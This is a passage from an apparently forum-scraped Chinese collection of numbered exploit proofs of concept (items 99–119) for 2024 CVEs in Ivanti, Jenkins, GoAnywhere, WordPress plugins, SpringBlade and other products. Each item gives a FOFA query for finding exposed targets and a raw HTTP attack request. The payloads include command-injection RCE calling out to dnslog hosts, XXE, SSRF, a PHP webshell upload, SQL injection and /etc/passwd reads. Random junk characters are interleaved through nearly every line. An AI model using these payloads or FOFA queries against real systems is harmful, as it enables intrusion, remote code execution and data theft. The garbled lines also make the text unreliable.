6 z- o% q% j9 pContent-Length: 1212 t; s, G0 j6 ^7 T1 o
Accept: */*# C1 H! I7 ^5 M4 r; m& p
Accept-Encoding: gzip, deflate$ ^3 o& M5 L9 y3 Z6 i: u
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 H5 F3 f9 W; y6 N# i; G
Content-Type: application/x-www-form-urlencoded; charset=UTF-89 f5 [3 b) O1 ]2 a
X-Requested-With: XMLHttpRequest
1 s) C: e( O( z0 {6 R$ p. l# s( I9 R/ `' I& Z V
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B) ]4 o) a# c0 o7 G/ t0 O( H. E- g
|2 N* @% H* F/ ]- ]2 g/ }" a J$ p$ a( }" V- P# z
99. Ncast盈可视高清智能录播系统busiFacade RCE7 h1 U2 N m& @& l5 O; I$ p1 M
CVE-2024-0305
6 @0 B, ~4 r; B& q' b; kFOFA:app="Ncast-产品" && title=="高清智能录播系统"$ O* `$ m5 B+ {1 r& n l t
POST /classes/common/busiFacade.php HTTP/1.12 J& ^: T: J7 P+ w. T" l
Host: 192.168.40.130:8080& u C& z: X* E. J# C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0) C2 _+ M% R- o0 s! w3 {
Connection: close
; E! {/ f# v4 ~5 Z7 FContent-Length: 154+ n, J1 |2 H, T$ v: r( K
Accept: */** Q d4 K0 c8 C9 U; S- F
Accept-Encoding: gzip, deflate
' q7 [2 w0 b8 u. ^+ ~Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ P$ H9 { [" m
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
& I. t5 N+ M7 `7 Y6 JX-Requested-With: XMLHttpRequest
4 P I5 m* f( ?6 F5 a% O' @2 D( u5 Y
& o" \4 L; _1 W% K2 @%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D% B) @/ J* X4 P+ P- c9 W
/ b. K6 b: P1 b0 P- b# C
; V) d: p5 J& H2 S4 K
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
8 F# t2 `; p5 i) [ l* FCVE-2024-0352) {# m6 w8 j7 ~
FOFA:icon_hash="874152924"1 m7 M2 c# r' p3 {" O& m! O0 s
POST /api/file/formimage HTTP/1.1! j' {8 E1 O. Z `. @
Host: 192.168.40.130
( d" g6 }" ]: {8 Q' c9 O& ]$ @5 _: nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36# E. F1 g7 u( T" G
Connection: close9 w3 ^) V1 R& V; ^, A7 a
Content-Length: 2019 O% v" d, Z- w/ a, R0 M
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei8 ]2 I- N" b; ]8 i9 J6 Z, ~ O
Accept-Encoding: gzip
% b! O. r4 y8 r, i9 ?7 {; {4 p7 s: R2 |. a$ J
------WebKitFormBoundarygcflwtei3 Y1 [) H, n6 @* h9 }
Content-Disposition: form-data; name="file";filename="IE4MGP.php" n% o# L( w7 c" @( c; y
Content-Type: application/x-php' O: B' O, k* Z
0 x, g3 `+ P4 A _5 s& \$ B2ayyhRXiAsKXL8olvF5s4qqyI2O
% Z! G: A, i4 s& U/ V5 j------WebKitFormBoundarygcflwtei--
5 ~( O% t. K* M8 `6 L2 O6 w" t. c6 I$ U* E7 ^+ B9 R0 }
+ l6 _" t( C3 l( ~) M8 y5 Q9 b1 t/ m101. ivanti policy secure-22.6命令注入, f3 U7 A- p+ b& W9 J" s! w& j, M
CVE-2024-21887# g! U9 }/ x; p! ^
FOFA:body="welcome.cgi?p=logo"9 u9 b6 J, t$ Z' N3 e
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1& d1 h3 ?0 ?6 c/ m6 f* C
Host: x.x.x.xx.x.x.x9 \/ y: b$ l) b6 R x# K3 a: C# b" f, l
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36# |8 `. `4 B5 X# L( D
Connection: close
7 q: c& Y% d/ X# |. |; Q8 WAccept-Encoding: gzip. j( w+ q; Z6 @: X7 h- H0 C6 ?
9 P! X: P" n6 j# X9 H5 e- ?3 t" }1 Y* t
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行9 e n* K6 D/ \. C/ D
CVE-2024-218932 K+ b; [2 v2 Y3 G5 Q( |
FOFA:body="welcome.cgi?p=logo"( |3 Y' ~! G% [9 D! Q
POST /dana-ws/saml20.ws HTTP/1.19 Y2 H! V! V5 f7 @
Host: x.x.x.x( t& M+ a. o! Z. w( `+ _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36* c! x* J7 ^+ c6 r X3 E T! y
Connection: close4 ]6 o% c" _5 u z% y
Content-Length: 7921 d$ o$ W7 t8 ~7 S
Accept-Encoding: gzip
. ^& S, T4 ]% @$ y8 `
& l1 v2 b/ K! F/ U. d) Y* w& M<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>1 a9 t+ ~6 L3 X5 K
2 P) c. H# ~+ A8 [* Y2 [4 x2 e103. Ivanti Pulse Connect Secure VPN XXE
* _6 Q& [3 r8 ?- e* G/ f/ w: e( LCVE-2024-22024, _4 K7 `5 h' v: E% k' z
FOFA:body="welcome.cgi?p=logo"
+ P# ?3 r* a% N( Z5 p6 [5 w+ B$ Y# MPOST /dana-na/auth/saml-sso.cgi HTTP/1.1
$ B( M' p9 J4 MHost: 192.168.40.130:111
5 C. I7 k" K: `. a3 zUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.364 }$ P' d% P% `" D% Z* a N
Connection: close
, [2 L' C9 a0 o# f# e V9 ~Content-Length: 204
: I5 d3 C' q/ M" p {* {Content-Type: application/x-www-form-urlencoded0 O7 ?/ O8 S2 p% T1 m3 x5 N3 v+ T
Accept-Encoding: gzip
$ p f [6 g. w0 \
) X- E* b- X1 E( Z2 J$ D9 pSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
# G& X9 o) ? z
! B/ g6 k4 ?, H- R) i5 S5 i) B4 D$ W2 E: |
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下4 ]8 {, G% `- f5 j* F
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>% @' t9 w/ [( f5 I/ v, i8 g: w1 F
9 W6 a4 i$ L- Q9 P; c, o1 W
2 D7 L c: B. G7 x A! f( b" _
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
% e$ [" P, a! t( e8 hCVE-2024-0569
% c# o F- N9 F' d/ k7 h3 s* K4 TFOFA:title="TOTOLINK"
& s- B$ X+ E0 y( xPOST /cgi-bin/cstecgi.cgi HTTP/1.1
7 e+ H5 x0 v0 d' J5 LHost:192.168.0.1
6 r3 B; R5 \, [Content-Length:41! B: ]3 F# J8 G @* E0 x
Accept:application/json,text/javascript,*/*;q=0.01
" z2 I. i7 W8 X3 _X-Requested-with: XMLHttpRequest
& Q3 J, U$ B$ s0 z0 e7 kUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
" J& u9 Z7 o0 \/ [/ }Content-Type: application/x-www-form-urlencoded:charset=UTF-8
7 B- l" i- @7 t4 |, m6 LOrigin: http://192.168.0.1
7 {7 v: u9 x) G/ J0 uReferer: http://192.168.0.1/advance/index.html?time=1671152380564
6 a9 E: k& b; ~- kAccept-Encoding:gzip,deflate
5 ]; G* d. O6 z3 d) VAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7$ ]& c$ d/ _' q- a2 I
Connection:close4 E9 H5 Z/ i3 l2 A! x e
( q( Q9 f5 Y1 @7 [% n" |
{$ J$ T, ]- i9 ]; e% u2 h. Z$ t
"topicurl":"getSysStatusCfg",
. e6 Q4 p2 g# }6 a1 U! T"token":""* I( y ]" E2 m. D; F7 N
}/ [& X z! r& w+ E
* v5 J( c* O5 w0 x0 J3 R( _105. SpringBlade v3.2.0 export-user SQL 注入* }! L. L* x6 }( N
FOFA:body="https://bladex.vip"
% s: O) T/ C( k, Q. Chttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
. q6 l9 [2 F; t# l/ O0 R1 \! v% L: a1 \! m5 p! }) u
106. SpringBlade dict-biz/list SQL 注入
+ F! Z3 g, i$ C7 Z' K% {2 FFOFA:body="Saber 将不能正常工作"
/ [" x6 i: T8 I' ?& SGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
. G. j& U8 S3 `+ f1 F8 F( ]/ WHost: your-ip. Y7 X& D( |) C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36) c' c# A$ ]" {2 ?4 d
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A4 O2 z- Q, j% a5 ?
Accept-Encoding: gzip, deflate
, S; i* G a: U9 ]& w9 I) HAccept-Language: zh-CN,zh;q=0.9! G( j3 \/ d b) Y/ w9 u
Connection: close
+ h. e& n9 ^0 \- S% w3 `# N. ^; k/ z ~# |$ ?
' M. Y M! \- o" ^$ z
107. SpringBlade tenant/list SQL 注入3 Z5 G9 p& R8 t }
FOFA:body="https://bladex.vip"% u" Q# |4 M! s# L1 M6 q
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
2 s( W7 h# v8 ?* R/ aHost: your-ip
( |& ?- i& {# [% ] n# d) k; {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.367 a" D, ?( D9 U2 S$ z6 @1 C
Blade-Auth:替换为自己的
! @: z* E- f/ @1 @6 N4 d2 JConnection: close; d4 t6 f# _# X8 D) q
. F6 S4 n0 W' P3 Z5 U: e
4 K/ t8 y6 v' W5 N108. D-Tale 3.9.0 SSRF
- L4 P# S3 O! @& [: MCVE-2024-21642
, n0 }9 p B2 v$ VFOFA:"dtale/static/images/favicon.png"
+ |0 U2 j* K2 e0 e% f: ]' p5 \0 R- ~GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1: B3 s' U$ Z9 {2 m" r
Host: your-ip
$ m, g: k) A; ~' WAccept: application/json, text/plain, */*
. e& c6 r/ C" _0 p1 Q$ ?1 t+ XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36! d' j+ a3 I E3 {
Accept-Encoding: gzip, deflate8 [0 @$ ^$ Q. S8 M E# i
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
% K, s8 F% q$ nConnection: close
% Q+ f5 G0 i8 s: n/ j) _+ g, t% o3 s: x% ~
- ]$ L% V% U0 U; l/ E; P% @
109. Jenkins CLI 任意文件读取( y; k$ u p8 E/ v: {
CVE-2024-23897
+ k, L# E) i3 K' p3 N. P- UFOFA:header="X-Jenkins"+ o! n( O a0 o& j. \# g
POST /cli?remoting=false HTTP/1.1* V% M. b+ p" T3 V' P0 r
Host:
) S) i# [2 h% r3 R' P$ }Content-type: application/octet-stream9 `3 e' D n7 i% E+ n3 Z
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92! p: m G2 w2 ^$ @0 n3 ?! i2 L
Side: upload
6 {, q6 ~# ]% z# L" ?9 aConnection: keep-alive
7 U2 U( M6 \! i; \! Z0 NContent-Length: 163
! T* J5 b7 S6 u% g4 H( M U& H
5 I8 Q3 ~2 ^6 [( V2 xb'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
1 ]4 n6 e' Q) s- i! f9 d8 G6 S ~6 S& X: r2 [/ c$ }; ?
" o7 d5 s3 O. Z/ s4 D. T
POST /cli?remoting=false HTTP/1.1
/ B% B t7 ^( d) v3 R1 CHost:
' _% Z" q, q2 z9 l% DSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
, _5 E8 [6 Z) f U* z7 wdownload
. F! |1 b: I' E) G% c! b% nContent-Type: application/x-www-form-urlencoded! f: Q( I" ]' M7 l0 h1 |
Content-Length: 0
! m5 `$ M6 a1 K/ ^ ~/ ^8 i. J g) r3 s K
" L# [" D: J0 H- Q! C% u" RERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin( H& V7 j; J7 ~) i) ?# S+ @5 Z& ?& |
java -jar jenkins-cli.jar help% G8 a' K" j1 z0 r2 o7 i1 W- ?
[COMMAND]
2 J2 y1 ^! g K& aLists all the available commands or a detailed description of single command.6 s/ C+ X, S* f% N& ]
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)3 Z' ]5 Z2 N" S$ m5 d
$ j) c2 Q. y" H) M
. Q' N) c0 ?7 _4 G110. Goanywhere MFT 未授权创建管理员
# j; b5 ^5 Z* S7 |% u0 B& W+ vCVE-2024-0204 I0 h v7 @, \' M6 Z. B
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"# w, |. v) k7 ]$ y: j
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
: t/ B8 {" u5 o4 ?% THost: 192.168.40.130:80007 u" q7 h3 k; R+ s0 i
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
( R. d) z4 ?" Q; @2 o( O# TConnection: close
' ]2 D! B/ z# KAccept: */*
* L8 K: i- d" wAccept-Language: en
8 o3 d+ b! Q: u" Q: w5 U$ ~Accept-Encoding: gzip& V7 a1 W6 a& r1 y- R, y& H+ l: A
, l+ R W* v9 ]- T) l2 ^
h, j% [/ v. v111. WordPress Plugin HTML5 Video Player SQL注入
3 R1 l- M) S, ]8 P6 k( qCVE-2024-1061
4 `5 c- K: T/ KFOFA:"wordpress" && body="html5-video-player"5 C, a1 W3 u) ~0 b
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1/ f, e9 w& ?' I& k! t
Host: 192.168.40.130:112
3 u" h1 t$ y" D- i/ [9 F- DUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36! J* J7 y& A# o5 V9 ~
Connection: close
5 ?# l% h) k2 V) b, f& z' c/ KAccept: */*. a9 V. B. g% R' [( ]& @- f1 j
Accept-Language: en
& L" S, y* A) kAccept-Encoding: gzip j5 n+ S+ ~4 V/ J7 Y
% V1 u# p+ _ @' {7 P" I( o. k0 b5 ^/ l! \; T3 |. Z
112. WordPress Plugin NotificationX SQL 注入
2 p: q$ c3 P ~# B* \0 ]CVE-2024-1698
% N2 ]+ n- E( h8 Q* l" V; ^3 B! tFOFA:body="/wp-content/plugins/notificationx"
0 S3 o( [$ o: IPOST /wp-json/notificationx/v1/analytics HTTP/1.13 E6 Y( v7 ?) o
Host: {{Hostname}}$ ~1 w n! l O8 L) g' \0 @3 Q
Content-Type: application/json9 f+ a9 i8 i3 j6 J
! [( w0 B9 A6 C( I7 F7 A{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
8 w o$ `; J3 l$ M" y; P; V, p: E0 o/ L# d6 d& r
% D/ {! J' {3 |/ a1 ?
113. WordPress Automatic 插件任意文件下载和SSRF3 s" |( `3 N6 Y. S
CVE-2024-27954' v5 O( o6 q: p$ H* ?) R. W
FOFA:"/wp-content/plugins/wp-automatic"6 J1 s' G u5 T
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.19 x/ Z7 R+ X% e" e
Host: x.x.x.x; y- I8 F$ v, C( _
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
1 ~* X; ?' W2 J5 xConnection: close7 r2 J3 {4 {7 _( C- V) Q6 |
Accept: */*
! D% k6 I" F8 M6 Q, HAccept-Language: en) B0 G7 y: ], t8 H
Accept-Encoding: gzip) _( u8 N1 A. |! `; D% w9 c; M% f
" t& p: P) ]7 O/ B) Z' f6 N; Q
6 S4 c' X! x# G# W) I( ]) Z" j
114. WordPress MasterStudy LMS插件 SQL注入% v- `2 T+ n/ ?0 X
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
4 q' D' W, n: e/ TGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1$ c' {0 S. K0 G+ G" N
Host: your-ip
* O7 |7 L4 o0 V/ {0 O4 cUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
: ~* u# z i" ?1 R- Y |Accept-Charset: utf-88 q" f6 ?$ C- m% ` c9 T
Accept-Encoding: gzip, deflate
, Z' T. M" s$ p# ]& n' c8 LConnection: close) x3 S- c9 i- P6 Q
/ f P! \ D; K0 p% s+ ]
; r. {5 N1 d% Y
115. WordPress Bricks Builder <= 1.9.6 RCE' I) ^& z, x j2 C
CVE-2024-25600+ o' k8 ]7 Y: [/ f4 P
FOFA: body="/wp-content/themes/bricks/"
$ L* b: U# a# R1 e% Q第一步,获取网站的nonce值
7 S2 x% h* H9 nGET / HTTP/1.16 e- w( b: j$ x4 m9 F
Host: x.x.x.x
7 g7 y+ c) c. m/ b% ?* AUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
; o" ^; w9 u# @Connection: close
$ I( y. f0 }- c# c( b9 c1 A i, lAccept-Encoding: gzip
. u: |1 y- n# [5 `! d6 [9 ]1 i3 T' f, Z+ Y; p6 r) L* K/ b
. s5 g- r+ o' D( p m5 `# p i第二步替换nonce值,执行命令+ s0 `2 g# f3 D% z" x/ \: D& b
POST /wp-json/bricks/v1/render_element HTTP/1.1
6 m! a$ ^ P% \! gHost: x.x.x.x
" Q" |9 N0 E9 j0 _User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36& h+ [% c. O0 D' `4 D6 J4 j1 j1 W
Connection: close
+ S' d" \) J$ d X9 bContent-Length: 356( `* {$ s c( k3 j3 |# D
Content-Type: application/json' _5 f( \# S1 ^8 V4 r
Accept-Encoding: gzip
/ b2 t3 t3 W+ z" b: d& q* ^0 N: u6 Q
Q1 U# c; w; l8 f' j- z( ]{9 l# x- {: a: C* g* X
"postId": "1",
5 ~) L4 P4 \: J: }0 o "nonce": "第一步获得的值",
; l$ _9 l! K, o9 v' ?# Q9 B "element": {
( G2 `4 l$ j6 E' j5 Y "name": "container",4 l- M- {. V! M
"settings": {; E9 L. S. F/ Z
"hasLoop": "true",
: z. x: f5 D" V D/ V% h "query": {5 \9 h. s" S0 T
"useQueryEditor": true,
/ e1 |+ J6 I, I* `% w0 C "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);", t' U/ d/ R) D8 i
"objectType": "post" M7 @& U" j" z. j$ Y2 A" X
}5 n8 @! q5 X$ `$ Y/ \" x" g
}+ ~! v! ?9 _0 t" I0 ~
}
# e5 A$ _! ~! Z F* e1 C}
P1 A' g, [, R. g, p
5 X( f3 c7 W; q! I' j/ `% y) b5 T+ N: b+ a
116. wordpress js-support-ticket文件上传7 v4 u! e7 o! \6 m1 b, U
FOFA:body="wp-content/plugins/js-support-ticket"
* r" `0 B; D. q5 A! qPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.16 c: C' t; l# K. m7 C0 w
Host:9 _* r' C& K3 ]0 M( }7 a% D
Content-Type: multipart/form-data; boundary=--------767099171
/ @3 Z: |2 n* ~1 |- _# RUser-Agent: Mozilla/5.00 [- t$ ~4 t# t9 u3 ~% {
5 E* a/ w, @" z( ^- F
----------767099171
2 L B) z3 C* _* o7 {; q& YContent-Disposition: form-data; name="action"0 g* M3 e6 C0 D# {! e3 l* A% \
configuration_saveconfiguration9 G: r) e; L2 j# ^9 V% @
----------767099171
( k: h+ j0 ^5 u- n" p$ w$ z: {) GContent-Disposition: form-data; name="form_request"
2 M* Z# m. X8 ]% U; n/ W4 h8 H' @jssupportticket( U0 h$ b2 G* ^4 t' } W# h9 U6 G2 Z9 {
----------767099171, Z. |' B3 I' T# S+ W J! d
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"/ h) d& @ v+ f& x
Content-Type: image/png+ {+ \/ c. ~; ~5 u3 s! U2 O3 `
----------767099171--) e- P+ ?- m2 T2 d* b4 V1 `" q
2 r8 U. G, B3 M0 P3 n) v: Y; T
" [' O& |0 E- S7 u
117. WordPress LayerSlider插件SQL注入( U- L' y6 Z$ ^, s9 P
version:7.9.11 – 7.10.0
$ z% [; a; G: q% r( D8 y% ?4 sFOFA:body="/wp-content/plugins/LayerSlider/"! a: }0 _) e4 Q/ `/ n+ s$ ?
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1# [; |2 P- H( {) i! l; L( z
Host: your-ip
/ A @3 ^6 V; d- j. NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
2 }; e: Z* ^. p1 P9 Q# nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, s" o+ [1 _$ w v" M7 O
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) D8 o/ o. F6 ]/ k' Y0 G
Accept-Encoding: gzip, deflate, br
1 G5 P$ k# ^, T2 V; p+ T1 x, XConnection: close
- i% B% T# L+ P8 d0 HUpgrade-Insecure-Requests: 1
: [4 h4 r2 I/ t0 c4 F+ B3 A9 b# P+ S2 c! K2 p/ F$ h( F
( W% X& R% m8 B0 d2 m2 v
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
$ Q n. L, K% w; ^" B4 ]: aCVE-2024-09390 @ f' m+ }8 ~9 o; @. _& e
FOFA:title="Smart管理平台"
6 t' R$ k: ?& OPOST /Tool/uploadfile.php? HTTP/1.12 \' d9 P5 o% Z/ {9 J* t7 E |% J
Host: 192.168.40.130:84438 y# |' N4 o4 K8 G5 n
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f86 t9 N0 F6 l$ M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.03 d f6 z" {/ i8 e* a: c& V
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 H2 s" l; b- G7 y; h6 y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 I8 e+ l+ M, Q- J; |7 BAccept-Encoding: gzip, deflate8 M7 q$ n& N1 d8 N% L7 u
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
3 Y5 Q. K, t1 o0 ?6 {$ VContent-Length: 405: j- {# I0 `! u- P& j/ z, j
Origin: https://192.168.40.130:8443; X1 S8 E% L6 H& w0 `
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
! n' Z2 O# G& PUpgrade-Insecure-Requests: 1
5 T, z! k, P. n) MSec-Fetch-Dest: document3 j6 b6 R$ y0 W& l0 n3 {9 g; d
Sec-Fetch-Mode: navigate- T/ I: N: q3 Q2 s/ c
Sec-Fetch-Site: same-origin
2 ] c) z8 A. I+ |% h% o' |# Z" b7 w6 QSec-Fetch-User: ?1
/ Z: F; N) z' |, MTe: trailers
% c0 k" r3 N( r0 }Connection: close: Y( {$ ?1 C- F+ x4 E8 V3 \3 n
5 \& |) R8 H9 _- F$ T( ~! O$ b-----------------------------139797012227476466340371828879 J# `) M$ G% i9 v
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
; k$ D2 N2 X4 U9 {' D. rContent-Type: application/octet-stream! H& s) R" T2 f1 V2 h- O3 e- H) T" p
; ^# T7 F1 r/ b# L w" \
<?php) `- l5 y7 Q; e1 t4 z+ D% b
system($_POST["passwd"]);' I: a7 T6 V" c. s$ V
?>' `' Q6 v3 I0 h
-----------------------------13979701222747646634037182887
/ f- Z- L5 w/ t$ [+ U, |/ H iContent-Disposition: form-data; name="txt_path"
/ s, U( J9 _( C6 I) I
4 e+ p7 S) ?% z/home/src.php
" m% P; X7 g8 p6 [6 b |; {3 l) A-----------------------------13979701222747646634037182887--6 j; ]4 b1 v9 b, l$ O
8 \$ H) {3 c/ b/ G/ Y0 K6 D. D2 Y; [4 S8 O) f* E8 _
访问/home/src.php
( R ]8 o& e& [7 \6 t) ^- s! s" W% m# ^4 T0 i
119. 北京百绰智能S20后台sysmanageajax.php sql注入
b1 r5 z, R7 U. t6 s/ m. [CVE-2024-1254' R* a7 U- p0 E1 \ i
FOFA:title="Smart管理平台"0 M1 b+ C: C: \+ i! x2 t% x
先登录进入系统,默认账号密码为admin/admin
i" R) ~# Q" J- r5 H6 S0 Z2 iPOST /sysmanage/sysmanageajax.php HTTP/1.11
2 {* I: i( M1 s5 z& i* R+ f! _) P( vHost: x.x.x.x* u2 r( m! P0 Y7 {
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee, t, f4 v3 R0 q, l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
" g+ W/ P$ _1 u. b- jAccept: */*
4 g5 G" W+ `" b0 u& ?3 Y8 EAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 U" |, p% Y( d, c8 fAccept-Encoding: gzip, deflate" C' E- P8 p9 F2 i4 y; y
Content-Type: application/x-www-form-urlencoded;* s! [ t! J5 ?, t$ P( }& k" f' O( g
Content-Length: 109) p$ s5 \) `3 y6 m9 y: L% y8 N
Origin: https://58.18.133.60:84432 a9 c, K4 ~; e, ?% A; q; n& v
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php0 W) c5 x; z9 S6 e) o! u0 T+ E' U. ?
